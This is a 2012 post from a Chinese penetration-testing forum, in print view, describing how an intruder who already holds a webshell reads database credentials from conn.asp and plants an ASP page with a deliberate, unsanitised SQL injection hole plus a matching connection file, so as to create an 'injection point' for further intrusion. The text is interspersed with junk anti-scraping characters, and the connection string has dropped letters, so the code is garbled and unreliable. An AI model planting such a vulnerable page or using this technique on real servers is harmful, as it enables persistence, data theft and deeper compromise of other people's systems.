中国网络渗透测试联盟

标题: 自己构造注入点方便入侵 [打印本页]

作者: admin    时间: 2012-9-13 17:27
标题: 自己构造注入点方便入侵
自己构造注入点方便入侵
# j' h5 V  u6 Y, B# ?) R1 t0 e9 a" H5 S  V4 Z, ?, p8 o+ c
今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息. M1 \7 D) O: D- e( {( v

8 ^/ e# F  _9 K" m- ?. C. ?' U这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!
: [+ t3 B- A4 ?% k$ b* ~, o9 j' v. S0 q9 a
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和7 |6 D/ n4 z  n, z" ]$ X4 C- H

8 e& {' q$ ]* R密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表: N' s/ `6 I3 @" O/ g

2 x9 H  Y# F+ E& L- ~因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:2 V4 m; [1 j8 y- m/ n8 W5 A

; _7 x/ L5 s, n3 @! K程序代码
& i$ e  U& R, ~<!--#include file="xx.asp"-->
! V6 W& y6 o( V- w2 T6 m) }<%
) X" \' I3 U* U9 }5 c1 {' {5 r% Q! sset rs=server.createobject("ADODB.recordset")
* L3 u; z, J  N3 Rid = request("id")9 k% T8 _/ Y! Q: I/ |$ N! x
strSQL = "select * from admin where id=" & id' E7 _  D& W" u* P- z/ h
rs.open strSQL,conn,1,3
1 Q9 {' R* ~% h( d9 P8 Nrs.close
4 v0 F4 D2 n2 W%>& U5 ]3 k2 d: ^$ G7 }: d0 Y- s
9 U4 ^+ Z$ W2 [  V6 T
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在
% X& u; S( P+ o( k" U. w& U, A# K) |2 F1 ~- U
你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
0 g! W3 I! H3 d$ C- E# Y2 w5 S9 z9 ~' T- I( L0 u
然后就要构造一个连接数据库的文件了,代码如下:
* l% O2 m7 g" A程序代码  l6 g* b/ u0 R. [
<%        
; X" I; @1 W4 [+ e. ]" YstrSQLServerName = "000.000.000.000"     '服务器名称或地址
5 x4 i+ J0 B% c; B- ystrSQLDBUserName = "sqlname"         '数据库帐号6 G0 v+ J! o5 G8 s) Z
strSQLDBPassword = "sqlpass"         '数据库密码
% T! J4 w, ^$ N7 }  O8 M' q$ f. rstrSQLDBName = "sqldataname"           '数据库名称
6 g8 s, Z$ t7 G" rSet conn = Server.CreateObject("ADODB.Connection")
, O7 f/ @( E9 U3 K$ PstrCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
6 B" w, K5 O" G7 ~conn.open strCon9 `8 u$ H; s  [- c# {/ {: H5 V, v" M
%>
( S& p/ A% T  }1 Y$ n
5 C5 B1 e: I5 L; M8 r* ?& W这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,
4 s& d0 Y' ?+ a6 l" d5 i
4 Z  A8 E3 S: f( z就这样,正常情况下,就OK了,伪造成功……  a% V% Q% p$ j) ^7 e# K

/ _  [. p: L9 y) v4 M           如果有什么问题可以提出来大家一起探讨解决。




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2